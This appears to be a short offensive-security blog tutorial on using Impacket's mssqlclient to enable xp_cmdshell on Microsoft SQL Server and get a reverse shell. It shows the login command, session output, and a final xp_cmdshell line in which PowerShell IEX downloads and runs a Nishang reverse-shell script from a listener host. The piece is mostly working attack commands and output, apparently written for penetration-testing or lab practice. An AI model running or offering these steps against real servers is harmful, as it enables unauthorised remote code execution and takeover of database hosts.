I would like to share about creating reverse shell with Impacket mssqllient which utilize the functionality of xp_cmdshell.
You can install impacket from its github that is available https://github.com/SecureAuthCorp/impacket
I have shared the tutorial in order to do xp_cmdshell activation manually in this url https://rioasmara.com/2020/01/31/mssql-rce-and-reverse-shell-xp_cmdshell/ and https://rioasmara.com/2020/01/31/mssql-rce-and-reverse-shell-xp_cmdshell-with-nishang/
With the Impacket mssqlclient you will not need to do manual things such as building the query in SQL scripting language in order to activate the xp_cmdshell. Impacket makes the things easier for you.
You can connect to the database using this command
mssqlclient.py rio_services@192.168.12.1 -windows-auth
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(RIODB): Line 1: Changed database context to 'master'.
[*] INFO(RIODB): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
If you type help and you will get information like below
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
You need to run the enable_xp_cmdshell in order for you to run the remote execution.
SQL> enable_xp_cmdshell
[*] INFO(RIODB): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(RIODB): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
There will out put like the above but actually you dont need to run the RECONFIGURE command since Impacket has done it for you.
The next thing is if you want to create reverse shell then you can just do the below command to connect back to your netcat server defined in the nishang powershell script
SQL> xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString(\"http://10.10.14.3:8000/rv.ps1\")
the above command is reverse shell using nishang framework. you can find the detail how to prepare nishang reverse shell in my previous tutorial.
Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis 